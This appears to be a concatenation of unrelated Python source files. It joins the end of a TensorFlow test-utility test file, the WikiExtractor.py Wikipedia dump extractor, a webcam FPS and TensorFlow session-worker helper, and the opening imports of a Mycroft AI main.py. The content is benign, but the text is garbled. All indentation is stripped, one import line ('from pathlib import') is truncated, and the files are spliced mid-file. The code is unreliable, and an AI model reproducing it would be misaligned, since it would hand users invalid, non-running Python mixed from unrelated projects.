# Test with tensors
x = constant_op.constant([1.0, 1.0], name="x")
y = math_ops.add(x, x)
self.assertAllClose([2.0, 2.0], y)
self.assertNotAllClose([0.9, 1.0], x)
with self.assertRaises(AssertionError):
self.assertNotAllClose([1.0, 1.0], x)
@test_util.run_in_graph_and_eager_modes
def testAssertNotAllCloseRTol(self):
# Test with arrays
with self.assertRaises(AssertionError):
self.assertNotAllClose([1.1, 2.1], [1.0, 2.0], rtol=0.2)
# Test with tensors
x = constant_op.constant([1.0, 1.0], name="x")
y = math_ops.add(x, x)
self.assertAllClose([2.0, 2.0], y)
with self.assertRaises(AssertionError):
self.assertNotAllClose([0.9, 1.0], x, rtol=0.2)
@test_util.run_in_graph_and_eager_modes
def testAssertNotAllCloseATol(self):
# Test with arrays
with self.assertRaises(AssertionError):
self.assertNotAllClose([1.1, 2.1], [1.0, 2.0], atol=0.2)
# Test with tensors
x = constant_op.constant([1.0, 1.0], name="x")
y = math_ops.add(x, x)
self.assertAllClose([2.0, 2.0], y)
with self.assertRaises(AssertionError):
self.assertNotAllClose([0.9, 1.0], x, atol=0.2)
@test_util.run_in_graph_and_eager_modes
def testAssertAllGreaterLess(self):
x = constant_op.constant([100.0, 110.0, 120.0], dtype=dtypes.float32)
y = constant_op.constant([10.0] * 3, dtype=dtypes.float32)
z = math_ops.add(x, y)
self.assertAllClose([110.0, 120.0, 130.0], z)
self.assertAllGreater(x, 95.0)
self.assertAllLess(x, 125.0)
with self.assertRaises(AssertionError):
self.assertAllGreater(x, 105.0)
with self.assertRaises(AssertionError):
self.assertAllGreater(x, 125.0)
with self.assertRaises(AssertionError):
self.assertAllLess(x, 115.0)
with self.assertRaises(AssertionError):
self.assertAllLess(x, 95.0)
@test_util.run_in_graph_and_eager_modes
def testAssertAllGreaterLessEqual(self):
x = constant_op.constant([100.0, 110.0, 120.0], dtype=dtypes.float32)
y = constant_op.constant([10.0] * 3, dtype=dtypes.float32)
z = math_ops.add(x, y)
self.assertAllEqual([110.0, 120.0, 130.0], z)
self.assertAllGreaterEqual(x, 95.0)
self.assertAllLessEqual(x, 125.0)
with self.assertRaises(AssertionError):
self.assertAllGreaterEqual(x, 105.0)
with self.assertRaises(AssertionError):
self.assertAllGreaterEqual(x, 125.0)
with self.assertRaises(AssertionError):
self.assertAllLessEqual(x, 115.0)
with self.assertRaises(AssertionError):
self.assertAllLessEqual(x, 95.0)
def testAssertAllInRangeWithNonNumericValuesFails(self):
s1 = constant_op.constant("Hello, ", name="s1")
c = constant_op.constant([1 + 2j, -3 + 5j], name="c")
b = constant_op.constant([False, True], name="b")
with self.assertRaises(AssertionError):
self.assertAllInRange(s1, 0.0, 1.0)
with self.assertRaises(AssertionError):
self.assertAllInRange(c, 0.0, 1.0)
with self.assertRaises(AssertionError):
self.assertAllInRange(b, 0, 1)
@test_util.run_in_graph_and_eager_modes
def testAssertAllInRange(self):
x = constant_op.constant([10.0, 15.0], name="x")
self.assertAllInRange(x, 10, 15)
with self.assertRaises(AssertionError):
self.assertAllInRange(x, 10, 15, open_lower_bound=True)
with self.assertRaises(AssertionError):
self.assertAllInRange(x, 10, 15, open_upper_bound=True)
with self.assertRaises(AssertionError):
self.assertAllInRange(
x, 10, 15, open_lower_bound=True, open_upper_bound=True)
@test_util.run_in_graph_and_eager_modes
def testAssertAllInRangeErrorMessageEllipses(self):
x_init = np.array([[10.0, 15.0]] * 12)
x = constant_op.constant(x_init, name="x")
with self.assertRaises(AssertionError):
self.assertAllInRange(x, 5, 10)
@test_util.run_in_graph_and_eager_modes
def testAssertAllInRangeDetectsNaNs(self):
x = constant_op.constant(
[[np.nan, 0.0], [np.nan, np.inf], [np.inf, np.nan]], name="x")
with self.assertRaises(AssertionError):
self.assertAllInRange(x, 0.0, 2.0)
@test_util.run_in_graph_and_eager_modes
def testAssertAllInRangeWithInfinities(self):
x = constant_op.constant([10.0, np.inf], name="x")
self.assertAllInRange(x, 10, np.inf)
with self.assertRaises(AssertionError):
self.assertAllInRange(x, 10, np.inf, open_upper_bound=True)
@test_util.run_in_graph_and_eager_modes
def testAssertAllInSet(self):
b = constant_op.constant([True, False], name="b")
x = constant_op.constant([13, 37], name="x")
self.assertAllInSet(b, [False, True])
self.assertAllInSet(b, (False, True))
self.assertAllInSet(b, {False, True})
self.assertAllInSet(x, [0, 13, 37, 42])
self.assertAllInSet(x, (0, 13, 37, 42))
self.assertAllInSet(x, {0, 13, 37, 42})
with self.assertRaises(AssertionError):
self.assertAllInSet(b, [False])
with self.assertRaises(AssertionError):
self.assertAllInSet(x, (42,))
def testRandomSeed(self):
# Call setUp again for WithCApi case (since it makes a new defeault graph
# after setup).
# TODO(skyewm): remove this when C API is permanently enabled.
self.setUp()
a = random.randint(1, 1000)
a_np_rand = np.random.rand(1)
with self.test_session():
a_rand = random_ops.random_normal([1]).eval()
# ensure that randomness in multiple testCases is deterministic.
self.setUp()
b = random.randint(1, 1000)
b_np_rand = np.random.rand(1)
with self.test_session():
b_rand = random_ops.random_normal([1]).eval()
self.assertEqual(a, b)
self.assertEqual(a_np_rand, b_np_rand)
self.assertEqual(a_rand, b_rand)
@test_util.run_in_graph_and_eager_modes
def test_callable_evaluate(self):
def model():
return resource_variable_ops.ResourceVariable(
name="same_name",
initial_value=1) + 1
with context.eager_mode():
self.assertEqual(2, self.evaluate(model))
@test_util.run_in_graph_and_eager_modes
def test_nested_tensors_evaluate(self):
expected = {"a": 1, "b": 2, "nested": {"d": 3, "e": 4}}
nested = {"a": constant_op.constant(1),
"b": constant_op.constant(2),
"nested": {"d": constant_op.constant(3),
"e": constant_op.constant(4)}}
self.assertEqual(expected, self.evaluate(nested))
def test_run_in_graph_and_eager_modes(self):
l = []
def inc(self, with_brackets):
del self # self argument is required by run_in_graph_and_eager_modes.
mode = "eager" if context.executing_eagerly() else "graph"
with_brackets = "with_brackets" if with_brackets else "without_brackets"
l.append((with_brackets, mode))
f = test_util.run_in_graph_and_eager_modes(inc)
f(self, with_brackets=False)
f = test_util.run_in_graph_and_eager_modes()(inc)
f(self, with_brackets=True)
self.assertEqual(len(l), 4)
self.assertEqual(set(l), {
("with_brackets", "graph"),
("with_brackets", "eager"),
("without_brackets", "graph"),
("without_brackets", "eager"),
})
def test_get_node_def_from_graph(self):
graph_def = graph_pb2.GraphDef()
node_foo = graph_def.node.add()
node_foo.name = "foo"
self.assertIs(test_util.get_node_def_from_graph("foo", graph_def), node_foo)
self.assertIsNone(test_util.get_node_def_from_graph("bar", graph_def))
def test_run_in_eager_and_graph_modes_test_class(self):
msg = "`run_test_in_graph_and_eager_modes` only supports test methods.*"
with self.assertRaisesRegexp(ValueError, msg):
@test_util.run_in_graph_and_eager_modes()
class Foo(object):
pass
del Foo # Make pylint unused happy.
def test_run_in_eager_and_graph_modes_skip_graph_runs_eager(self):
modes = []
def _test(self):
if not context.executing_eagerly():
self.skipTest("Skipping in graph mode")
modes.append("eager" if context.executing_eagerly() else "graph")
test_util.run_in_graph_and_eager_modes(_test)(self)
self.assertEqual(modes, ["eager"])
def test_run_in_eager_and_graph_modes_skip_eager_runs_graph(self):
modes = []
def _test(self):
if context.executing_eagerly():
self.skipTest("Skipping in eager mode")
modes.append("eager" if context.executing_eagerly() else "graph")
test_util.run_in_graph_and_eager_modes(_test)(self)
self.assertEqual(modes, ["graph"])
def test_run_in_graph_and_eager_modes_setup_in_same_mode(self):
modes = []
mode_name = lambda: "eager" if context.executing_eagerly() else "graph"
class ExampleTest(test_util.TensorFlowTestCase):
def runTest(self):
pass
def setUp(self):
modes.append("setup_" + mode_name())
@test_util.run_in_graph_and_eager_modes
def testBody(self):
modes.append("run_" + mode_name())
e = ExampleTest()
e.setUp()
e.testBody()
self.assertEqual(modes[0:2], ["setup_graph", "run_graph"])
self.assertEqual(modes[2:], ["setup_eager", "run_eager"])
# Its own test case to reproduce variable sharing issues which only pop up when
# setUp() is overridden and super() is not called.
class GraphAndEagerNoVariableSharing(test_util.TensorFlowTestCase):
def setUp(self):
pass # Intentionally does not call TensorFlowTestCase's super()
@test_util.run_in_graph_and_eager_modes
def test_no_variable_sharing(self):
variable_scope.get_variable(
name="step_size",
initializer=np.array(1e-5, np.float32),
use_resource=True,
trainable=False)
class GarbageCollectionTest(test_util.TensorFlowTestCase):
def test_no_reference_cycle_decorator(self):
class ReferenceCycleTest(object):
def __init__(inner_self): # pylint: disable=no-self-argument
inner_self.assertEqual = self.assertEqual # pylint: disable=invalid-name
@test_util.assert_no_garbage_created
def test_has_cycle(self):
a = []
a.append(a)
@test_util.assert_no_garbage_created
def test_has_no_cycle(self):
pass
with self.assertRaises(AssertionError):
ReferenceCycleTest().test_has_cycle()
ReferenceCycleTest().test_has_no_cycle()
@test_util.run_in_graph_and_eager_modes
def test_no_leaked_tensor_decorator(self):
class LeakedTensorTest(object):
def __init__(inner_self): # pylint: disable=no-self-argument
inner_self.assertEqual = self.assertEqual # pylint: disable=invalid-name
@test_util.assert_no_new_tensors
def test_has_leak(self):
self.a = constant_op.constant([3.], name="leak")
@test_util.assert_no_new_tensors
def test_has_no_leak(self):
constant_op.constant([3.], name="no-leak")
with self.assertRaisesRegexp(AssertionError, "Tensors not deallocated"):
LeakedTensorTest().test_has_leak()
LeakedTensorTest().test_has_no_leak()
def test_no_new_objects_decorator(self):
class LeakedObjectTest(object):
def __init__(inner_self): # pylint: disable=no-self-argument
inner_self.assertEqual = self.assertEqual # pylint: disable=invalid-name
inner_self.accumulation = []
@test_util.assert_no_new_pyobjects_executing_eagerly
def test_has_leak(self):
self.accumulation.append([1.])
@test_util.assert_no_new_pyobjects_executing_eagerly
def test_has_no_leak(self):
self.not_accumulating = [1.]
with self.assertRaises(AssertionError):
LeakedObjectTest().test_has_leak()
LeakedObjectTest().test_has_no_leak()
if __name__ == "__main__":
googletest.main()
|
WikiExtractor.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# =============================================================================
# Version: 3.0 (July 22, 2020)
# Author: Giuseppe Attardi (attardi@di.unipi.it), University of Pisa
#
# Contributors:
# Antonio Fuschetto (fuschett@aol.com)
# Leonardo Souza (lsouza@amtera.com.br)
# Juan Manuel Caicedo (juan@cavorite.com)
# Humberto Pereira (begini@gmail.com)
# Siegfried-A. Gevatter (siegfried@gevatter.com)
# Pedro Assis (pedroh2306@gmail.com)
# Wim Muskee (wimmuskee@gmail.com)
# Radics Geza (radicsge@gmail.com)
# Nick Ulven (nulven@github)
#
# =============================================================================
# Copyright (c) 2009-2020. Giuseppe Attardi (attardi@di.unipi.it).
# =============================================================================
# This file is part of Tanl.
#
# Tanl is free software; you can redistribute it and/or modify it
# under the terms of the GNU Affero General Public License, version 3,
# as published by the Free Software Foundation.
#
# Tanl is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
# =============================================================================
"""Wikipedia Extractor:
Extracts and cleans text from a Wikipedia database dump and stores output in a
number of files of similar size in a given directory.
Each file will contain several documents in the format:
<doc id="" url="" title="">
...
</doc>
If the program is invoked with the --json flag, then each file will
contain several documents formatted as json ojects, one per line, with
the following structure
{"id": "", "revid": "", "url": "", "title": "", "text": "..."}
The program performs template expansion by preprocesssng the whole dump and
collecting template definitions.
"""
import argparse
import bz2
import logging
import os.path
import re # TODO use regex when it will be standard
import sys
from io import StringIO
from multiprocessing import Queue, Process, cpu_count
from timeit import default_timer
from pathlib import
sys.path.append('workspace/wikiextractor')
from extract import Extractor, ignoreTag, define_template, acceptedNamespaces
# ===========================================================================
# Program version
__version__ = '3.0.5'
##
# Defined in <siteinfo>
# We include as default Template, when loading external template file.
knownNamespaces = set(['Template'])
##
# The namespace used for template definitions
# It is the name associated with namespace key=10 in the siteinfo header.
templateNamespace = ''
templatePrefix = ''
##
# The namespace used for module definitions
# It is the name associated with namespace key=828 in the siteinfo header.
moduleNamespace = ''
# ----------------------------------------------------------------------
# Modules
# Only minimal support
# FIXME: import Lua modules.
modules = {
'convert': {
'convert': lambda x, u, *rest: x + ' ' + u, # no conversion
}
}
# ----------------------------------------------------------------------
# Expand using WikiMedia API
# import json
# def expandTemplates(text):
# """Expand templates invoking MediaWiki API"""
# text = urlib.urlencodew(text.encode('utf-8'))
# base = urlbase[:urlbase.rfind('/')]
# url = base + "/w/api.php?action=expandtemplates&format=json&text=" + text
# exp = json.loads(urllib.urlopen(url))
# return exp['expandtemplates']['*']
# ------------------------------------------------------------------------------
# Output
class NextFile():
"""
Synchronous generation of next available file name.
"""
filesPerDir = 100
def __init__(self, path_name):
self.path_name = path_name
self.dir_index = -1
self.file_index = -1
def next(self):
self.file_index = (self.file_index + 1) % NextFile.filesPerDir
if self.file_index == 0:
self.dir_index += 1
dirname = self._dirname()
if not os.path.isdir(dirname):
os.makedirs(dirname)
return self._filepath()
def _dirname(self):
char1 = self.dir_index % 26
char2 = int(self.dir_index / 26) % 26
return os.path.join(self.path_name, '%c%c' % (ord('A') + char2, ord('A') + char1))
def _filepath(self):
return '%s/wiki_%02d' % (self._dirname(), self.file_index)
class OutputSplitter():
"""
File-like object, that splits output to multiple files of a given max size.
"""
def __init__(self, nextFile, max_file_size=0, compress=True):
"""
:param nextFile: a NextFile object from which to obtain filenames
to use.
:param max_file_size: the maximum size of each file.
:para compress: whether to write data with bzip compression.
"""
self.nextFile = nextFile
self.compress = compress
self.max_file_size = max_file_size
self.file = self.open(self.nextFile.next())
def reserve(self, size):
if self.file.tell() + size > self.max_file_size:
self.close()
self.file = self.open(self.nextFile.next())
def write(self, data):
self.reserve(len(data))
if self.compress:
self.file.write(data.encode('utf-8'))
else:
self.file.write(data)
def close(self):
self.file.close()
def open(self, filename):
if self.compress:
return bz2.BZ2File(filename + '.bz2', 'w')
else:
return open(filename, 'w')
# ----------------------------------------------------------------------
# READER
tagRE = re.compile(r'(.*?)<(/?\w+)[^>]*>(?:([^<]*)(<.*?>)?)?')
# 1 2 3 4
def load_templates(file, output_file=None):
"""
Load templates from :param file:.
:param output_file: file where to save templates and modules.
"""
global templateNamespace, templatePrefix
templatePrefix = templateNamespace + ':'
global moduleNamespace, modulePrefix
modulePrefix = moduleNamespace + ':'
articles = 0
templates = 0
page = []
inText = False
if output_file:
output = open(output_file, 'w')
for line in file:
#line = line.decode('utf-8')
if '<' not in line: # faster than doing re.search()
if inText:
page.append(line)
continue
m = tagRE.search(line)
if not m:
continue
tag = m.group(2)
if tag == 'page':
page = []
elif tag == 'title':
title = m.group(3)
elif tag == 'text':
inText = True
line = line[m.start(3):m.end(3)]
page.append(line)
if m.lastindex == 4: # open-close
inText = False
elif tag == '/text':
if m.group(1):
page.append(m.group(1))
inText = False
elif inText:
page.append(line)
elif tag == '/page':
if not output_file and not templateNamespace: # do not know it yet
# we reconstruct it from the first title
colon = title.find(':')
if colon > 1:
templateNamespace = title[:colon]
templatePrefix = title[:colon + 1]
# FIXME: should reconstruct also moduleNamespace
if title.startswith(templatePrefix):
define_template(title, page)
templates += 1
# save templates and modules to file
if output_file and (title.startswith(templatePrefix) or
title.startswith(modulePrefix)):
output.write('<page>\n')
output.write(' <title>%s</title>\n' % title.encode('utf-8'))
output.write(' <ns>10</ns>\n')
output.write(' <text>')
for line in page:
output.write(line.encode('utf-8'))
output.write(' </text>\n')
output.write('</page>\n')
page = []
articles += 1
if articles % 100000 == 0:
logging.info("Preprocessed %d pages", articles)
if output_file:
output.close()
logging.info("Saved %d templates to '%s'", templates, output_file)
return templates
def decode_open(filename, mode='rt', encoding='utf-8'):
"""
Open a file, decode and decompress, depending on extension `gz`, or 'bz2`.
:param filename: the file to open.
"""
ext = os.path.splitext(filename)[1]
if ext == '.gz':
import gzip
return gzip.open(filename, mode, encoding=encoding)
elif ext == '.bz2':
return bz2.open(filename, mode=mode, encoding=encoding)
else:
return open(filename, mode, encoding=encoding)
def process_dump(input_file, template_file, out_file, file_size, file_compress,
process_count, html_safe):
"""
:param input_file: name of the wikipedia dump file; '-' to read from stdin
:param template_file: optional file with template definitions.
:param out_file: directory where to store extracted data, or '-' for stdout
:param file_size: max size of each extracted file, or None for no max (one file)
:param file_compress: whether to compress files with bzip.
:param process_count: number of extraction processes to spawn.
"""
global knownNamespaces
global templateNamespace, templatePrefix
global moduleNamespace, modulePrefix
urlbase = '' # This is obtained from <siteinfo>
input = decode_open(input_file)
# collect siteinfo
for line in input:
line = line #.decode('utf-8')
m = tagRE.search(line)
if not m:
continue
tag = m.group(2)
if tag == 'base':
# discover urlbase from the xml dump file
# /mediawiki/siteinfo/base
base = m.group(3)
urlbase = base[:base.rfind("/")]
elif tag == 'namespace':
knownNamespaces.add(m.group(3))
if re.search('key="10"', line):
templateNamespace = m.group(3)
templatePrefix = templateNamespace + ':'
elif re.search('key="828"', line):
moduleNamespace = m.group(3)
modulePrefix = moduleNamespace + ':'
elif tag == '/siteinfo':
break
if expand_templates:
# preprocess
template_load_start = default_timer()
if template_file and os.path.exists(template_file):
logging.info("Preprocessing '%s' to collect template definitions: this may take some time.", template_file)
file = decode_open(template_file)
templates = load_templates(file)
file.close()
else:
if input_file == '-':
# can't scan then reset stdin; must error w/ suggestion to specify template_file
raise ValueError("to use templates with stdin dump, must supply explicit template-file")
logging.info("Preprocessing '%s' to collect template definitions: this may take some time.", input_file)
templates = load_templates(input, template_file)
input.close()
input = decode_open(input_file)
template_load_elapsed = default_timer() - template_load_start
logging.info("Loaded %d templates in %.1fs", templates, template_load_elapsed)
if out_file == '-':
output = sys.stdout
if file_compress:
logging.warn("writing to stdout, so no output compression (use an external tool)")
else:
nextFile = NextFile(out_file)
output = OutputSplitter(nextFile, file_size, file_compress)
# process pages
logging.info("Starting page extraction from %s.", input_file)
extract_start = default_timer()
# Parallel Map/Reduce:
# - pages to be processed are dispatched to workers
# - a reduce process collects the results, sort them and print them.
maxsize = 10 * process_count
# output queue
output_queue = Queue(maxsize=maxsize)
# Reduce job that sorts and prints output
reduce = Process(target=reduce_process, args=(output_queue, output))
reduce.start()
# initialize jobs queue
jobs_queue = Queue(maxsize=maxsize)
# start worker processes
logging.info("Using %d extract processes.", process_count)
workers = []
for _ in range(max(1, process_count)):
extractor = Process(target=extract_process,
args=(jobs_queue, output_queue, html_safe))
extractor.daemon = True # only live while parent process lives
extractor.start()
workers.append(extractor)
# Mapper process
# we collect individual lines, since str.join() is significantly faster
# than concatenation
page = []
id = ''
revid = ''
last_id = ''
ordinal = 0 # page count
inText = False
redirect = False
for line in input:
if '<' not in line: # faster than doing re.search()
if inText:
page.append(line)
continue
m = tagRE.search(line)
if not m:
continue
tag = m.group(2)
if tag == 'page':
page = []
redirect = False
elif tag == 'id' and not id:
id = m.group(3)
elif tag == 'id' and id: # <revision> <id></id> </revision>
revid = m.group(3)
elif tag == 'title':
title = m.group(3)
elif tag == 'redirect':
redirect = True
elif tag == 'text':
inText = True
line = line[m.start(3):m.end(3)]
page.append(line)
if m.lastindex == 4: # open-close
inText = False
elif tag == '/text':
if m.group(1):
page.append(m.group(1))
inText = False
elif inText:
page.append(line)
elif tag == '/page':
colon = title.find(':')
if (colon < 0 or (title[:colon] in acceptedNamespaces) and id != last_id and
not redirect and not title.startswith(templateNamespace)):
job = (id, revid, urlbase, title, page, ordinal)
jobs_queue.put(job) # goes to any available extract_process
last_id = id
ordinal += 1
id = ''
revid = ''
page = []
input.close()
# signal termination
for _ in workers:
jobs_queue.put(None)
# wait for workers to terminate
for w in workers:
w.join()
# signal end of work to reduce process
output_queue.put(None)
# wait for it to finish
reduce.join()
if output != sys.stdout:
output.close()
extract_duration = default_timer() - extract_start
extract_rate = ordinal / extract_duration
logging.info("Finished %d-process extraction of %d articles in %.1fs (%.1f art/s)",
process_count, ordinal, extract_duration, extract_rate)
# ----------------------------------------------------------------------
# Multiprocess support
def extract_process(jobs_queue, output_queue, html_safe):
"""Pull tuples of raw page content, do CPU/regex-heavy fixup, push finished text
:param jobs_queue: where to get jobs.
:param output_queue: where to queue extracted text for output.
:html_safe: whether to convert entities in text to HTML.
"""
while True:
job = jobs_queue.get() # job is (id, revid, urlbase, title, page, ordinal)
if job:
out = StringIO() # memory buffer
Extractor(*job[:-1]).extract(out, html_safe) # (id, urlbase, title, page)
text = out.getvalue()
output_queue.put((job[-1], text)) # (ordinal, extracted_text)
out.close()
else:
break
def reduce_process(output_queue, output):
"""Pull finished article text, write series of files (or stdout)
:param output_queue: text to be output.
:param output: file object where to print.
"""
interval_start = default_timer()
period = 100000
# FIXME: use a heap
ordering_buffer = {} # collected pages
next_ordinal = 0 # sequence number of pages
while True:
if next_ordinal in ordering_buffer:
output.write(ordering_buffer.pop(next_ordinal))
next_ordinal += 1
# progress report
if next_ordinal % period == 0:
interval_rate = period / (default_timer() - interval_start)
logging.info("Extracted %d articles (%.1f art/s)",
next_ordinal, interval_rate)
interval_start = default_timer()
else:
# mapper puts None to signal finish
pair = output_queue.get()
if not pair:
break
ordinal, text = pair
ordering_buffer[ordinal] = text
# ----------------------------------------------------------------------
# Minimum size of output files
minFileSize = 200 * 1024
def main():
print("wikiiextractor main running")
global urlbase, acceptedNamespaces
global expand_templates, templateCache
parser = argparse.ArgumentParser(prog=os.path.basename(sys.argv[0]),
formatter_class=argparse.RawDescriptionHelpFormatter,
description=__doc__)
parser.add_argument("input",
help="XML wiki dump file")
groupO = parser.add_argument_group('Output')
groupO.add_argument("-o", "--output", default="text",
help="directory for extracted files (or '-' for dumping to stdout)")
groupO.add_argument("-b", "--bytes", default="1M",
help="maximum bytes per output file (default %(default)s)",
metavar="n[KMG]")
groupO.add_argument("-c", "--compress", action="store_true",
help="compress output files using bzip")
groupO.add_argument("--json", action="store_true",
help="write output in json format instead of the default <doc> format")
groupP = parser.add_argument_group('Processing')
groupP.add_argument("--html", action="store_true",
help="produce HTML output, subsumes --links")
groupP.add_argument("-l", "--links", action="store_true",
help="preserve links")
groupP.add_argument("-ns", "--namespaces", default="", metavar="ns1,ns2",
help="accepted namespaces")
groupP.add_argument("--templates",
help="use or create file containing templates")
groupP.add_argument("--no-templates", action="store_false",
help="Do not expand templates")
groupP.add_argument("--html-safe", default=True,
help="use to produce HTML safe output within <doc>...</doc>")
default_process_count = cpu_count() - 1
parser.add_argument("--processes", type=int, default=default_process_count,
help="Number of processes to use (default %(default)s)")
groupS = parser.add_argument_group('Special')
groupS.add_argument("-q", "--quiet", action="store_true",
help="suppress reporting progress info")
groupS.add_argument("--debug", action="store_true",
help="print debug info")
groupS.add_argument("-a", "--article", action="store_true",
help="analyze a file containing a single article (debug option)")
groupS.add_argument("-v", "--version", action="version",
version='%(prog)s ' + __version__,
help="print program version")
args = parser.parse_args()
Extractor.keepLinks = args.links
Extractor.HtmlFormatting = args.html
if args.html:
Extractor.keepLinks = True
Extractor.to_json = args.json
expand_templates = args.no_templates
try:
power = 'kmg'.find(args.bytes[-1].lower()) + 1
file_size = int(args.bytes[:-1]) * 1024 ** power
if file_size < minFileSize:
raise ValueError()
except ValueError:
logging.error('Insufficient or invalid size: %s', args.bytes)
return
if args.namespaces:
acceptedNamespaces = set(args.namespaces.split(','))
FORMAT = '%(levelname)s: %(message)s'
logging.basicConfig(format=FORMAT)
logger = logging.getLogger()
if not args.quiet:
logger.setLevel(logging.INFO)
if args.debug:
logger.setLevel(logging.DEBUG)
input_file = args.input
if not Extractor.keepLinks:
ignoreTag('a')
# sharing cache of parser templates is too slow:
# manager = Manager()
# templateCache = manager.dict()
if args.article:
if args.templates:
if os.path.exists(args.templates):
with open(args.templates) as file:
load_templates(file)
with open(input_file) as file:
page = file.read()
print(input_file, "open")
ids = re.findall(r'<id>(\d*?)</id>', page)
id = ids[0] if ids else ''
revid = ids[1] if len(ids) > 1 else ''
m = re.search(r'<title>(.*?)</title>', page)
if m:
title = m.group(1)
else:
logging.error('Missing title element')
return
m = re.search(r'<base>(.*?)</base>', page)
if m:
base = m.group(1)
urlbase = base[:base.rfind("/")]
else:
urlbase = ''
Extractor(id, revid, urlbase, title, [page]).extract(sys.stdout)
return
output_path = args.output
if output_path != '-' and not os.path.isdir(output_path):
try:
os.makedirs(output_path)
except:
logging.error('Could not create: %s', output_path)
return
process_dump(input_file, args.templates, output_path, file_size,
args.compress, args.processes, args.html_safe)
if __name__ == '__main__':
main()
|
helper.py
|
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""
Created on Fri Dec 22 11:53:52 2017
@author: GustavZ
"""
import datetime
import cv2
import threading
import time
import tensorflow as tf
import sys
PY2 = sys.version_info[0] == 2
PY3 = sys.version_info[0] == 3
if PY2:
import Queue
elif PY3:
import queue as Queue
class FPS:
# from https://www.pyimagesearch.com/2015/12/21/increasing-webcam-fps-with-python-and-opencv/
def __init__(self):
# store the start time, end time, and total number of frames
# that were examined between the start and end intervals
self._start = None
self._end = None
self._numFrames = 0
def start(self):
# start the timer
self._start = datetime.datetime.now()
return self
def stop(self):
# stop the timer
self._end = datetime.datetime.now()
def update(self):
# increment the total number of frames examined during the
# start and end intervals
self._numFrames += 1
def elapsed(self):
# return the total number of seconds between the start and
# end interval
return (self._end - self._start).total_seconds()
def fps(self):
# compute the (approximate) frames per second
return self._numFrames / self.elapsed()
class FPS2:
def __init__(self, interval):
self._glob_start = None
self._glob_end = None
self._glob_numFrames = 0
self._local_start = None
self._local_numFrames = 0
self._interval = interval
self.curr_local_elapsed = None
self.first = False
def start(self):
self._glob_start = datetime.datetime.now()
self._local_start = self._glob_start
return self
def stop(self):
self._glob_end = datetime.datetime.now()
def update(self):
self.first = True
curr_time = datetime.datetime.now()
self.curr_local_elapsed = (curr_time - self._local_start).total_seconds()
self._glob_numFrames += 1
self._local_numFrames += 1
if self.curr_local_elapsed > self._interval:
print("> FPS: {}".format(self.fps_local()))
self._local_numFrames = 0
self._local_start = curr_time
def elapsed(self):
return (self._glob_end - self._glob_start).total_seconds()
def fps(self):
return self._glob_numFrames / self.elapsed()
def fps_local(self):
if self.first:
return round(self._local_numFrames / self.curr_local_elapsed,1)
else:
return 0.0
class WebcamVideoStream:
# with modifications from https://www.pyimagesearch.com/2015/12/21/increasing-webcam-fps-with-python-and-opencv/
def __init__(self, src, width, height):
# initialize the video camera stream and read the first frame
# from the stream
self.frame_counter = 1
self.width = width
self.height = height
self.stream = cv2.VideoCapture(src)
self.stream.set(cv2.CAP_PROP_FRAME_WIDTH, self.width)
self.stream.set(cv2.CAP_PROP_FRAME_HEIGHT, self.height)
(self.grabbed, self.frame) = self.stream.read()
# initialize the variable used to indicate if the thread should
# be stopped
self.stopped = False
#Debug stream shape
self.real_width = int(self.stream.get(3))
self.real_height = int(self.stream.get(4))
print("> Start video stream with shape: {},{}".format(self.real_width,self.real_height))
def start(self):
# start the thread to read frames from the video stream
threading.Thread(target=self.update, args=()).start()
return self
def update(self):
# keep looping infinitely until the thread is stopped
while True:
# if the thread indicator variable is set, stop the thread
if self.stopped:
self.stream.release()
return
# otherwise, read the next frame from the stream
(self.grabbed, self.frame) = self.stream.read()
self.frame_counter += 1
def read(self):
# return the frame most recently read
return self.frame
def stop(self):
# indicate that the thread should be stopped
self.stopped = True
def isActive(self):
# check if VideoCapture is still Opened
return self.stream.isOpened
def resize(self):
try:
self.frame = cv2.resize(self.frame, (self.width, self.height))
except:
print("> Error resizing video stream")
class SessionWorker():
# from https://github.com/naisy/realtime_object_detection/blob/master/lib/session_worker.py
# TensorFlow Session Thread
#
# usage:
# before:
# results = sess.run([opt1,opt2],feed_dict={input_x:x,input_y:y})
# after:
# opts = [opt1,opt2]
# feeds = {input_x:x,input_y:y}
# woker = SessionWorker("TAG",graph,config)
# worker.put_sess_queue(opts,feeds)
# q = worker.get_result_queue()
# if q is None:
# continue
# results = q['results']
# extras = q['extras']
#
# extras: None or frame image data for draw. GPU detection thread doesn't wait result. Therefore, keep frame image data if you want to draw detection result boxes on image.
#
def __init__(self,tag,graph,config):
self.lock = threading.Lock()
self.sess_queue = Queue.Queue()
self.result_queue = Queue.Queue()
self.tag = tag
t = threading.Thread(target=self.execution,args=(graph,config))
t.setDaemon(True)
t.start()
return
def execution(self,graph,config):
self.is_thread_running = True
try:
with tf.Session(graph=graph,config=config) as sess:
while self.is_thread_running:
while not self.sess_queue.empty():
q = self.sess_queue.get(block=False)
opts = q["opts"]
feeds= q["feeds"]
extras= q["extras"]
if feeds is None:
results = sess.run(opts)
else:
results = sess.run(opts,feed_dict=feeds)
self.result_queue.put({"results":results,"extras":extras})
self.sess_queue.task_done()
time.sleep(0.005)
except:
import traceback
traceback.print_exc()
self.stop()
return
def is_sess_empty(self):
if self.sess_queue.empty():
return True
else:
return False
def put_sess_queue(self,opts,feeds=None,extras=None):
self.sess_queue.put({"opts":opts,"feeds":feeds,"extras":extras})
return
def is_result_empty(self):
if self.result_queue.empty():
return True
else:
return False
def get_result_queue(self):
result = None
if not self.result_queue.empty():
result = self.result_queue.get(block=False)
self.result_queue.task_done()
return result
def stop(self):
self.is_thread_running=False
with self.lock:
while not self.sess_queue.empty():
q = self.sess_queue.get(block=False)
self.sess_queue.task_done()
return
|
main.py
|
# Copyright 2017 Mycroft AI Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import sys
from threading import Thread, Lock
from mycroft.client.enclosure.api import EnclosureAPI
from mycroft.client.speech.listener import RecognizerLoop
